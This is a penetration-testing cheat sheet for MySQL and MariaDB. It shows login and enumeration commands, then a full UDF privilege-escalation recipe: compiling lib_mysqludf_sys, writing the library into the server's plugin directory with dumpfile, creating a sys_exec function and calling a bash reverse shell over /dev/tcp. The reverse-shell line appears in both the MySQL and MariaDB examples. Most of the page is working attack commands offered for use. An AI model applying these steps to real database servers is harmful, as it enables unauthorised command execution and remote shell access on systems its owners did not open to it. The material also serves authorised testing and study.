# MySQL / MariaDB

Basic CLI syntax:

```
$ mysql -h 127.0.0.1 -P 3306 -u snovvcrash -p'Passw0rd!' -e 'show databases;'
```

Basic enumeration:

```
mysql> show GRANTS;
mysql> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir;
```

## UDF PrivEsc

* <https://www.exploit-db.com/exploits/1518>
* <https://github.com/mysqludf/lib_mysqludf_sys>
* <https://gist.github.com/snovvcrash/efeb79d3e2648ec5009dd2ea7052f8b9>

Install dependencies:

```
$ sudo apt install libmariadbclient-dev -y
$ git clone https://github.com/mysqludf/lib_mysqludf_sys && cd lib_mysqludf_sys
```

Compile `.so` library (x86 example):

```
$ sudo apt install libc6-dev-i386 -y
$ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x86.so -m32 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6
```

Compile `.so` library (x64 example):

```
$ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x64.so -m64 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6
```

Convert library to hex:

```
$ xxd -p lib_mysqludf_sys.so | tr -d '\n'
```

Load library and call user-defined `sys_exec` function with a rev-shell.

MySQL (x86 example):

```
mysql> use mysql;
mysql> create table pwn(line blob);
mysql> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x86.so'));
mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so';

Or load it from hex:
mysql> set @pwn = '7F..00';
mysql> select unhex(@pwn) into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so';

mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_x86.so';
mysql> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'");
```

MariaDB (x64 example):

```
MariaDB> show variables like '%plugin%';  # get lib path
MariaDB> use mysql;
MariaDB> create table pwn(line blob);
MariaDB> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x64.so'));
MariaDB> select * from pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so';

Or load it from hex:
MariaDB> set @pwn = 0x7F..00;
MariaDB> select binary @pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so';

MariaDB> create function sys_exec returns integer soname 'lib_mysqludf_sys_x64.so';
MariaDB> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'");
```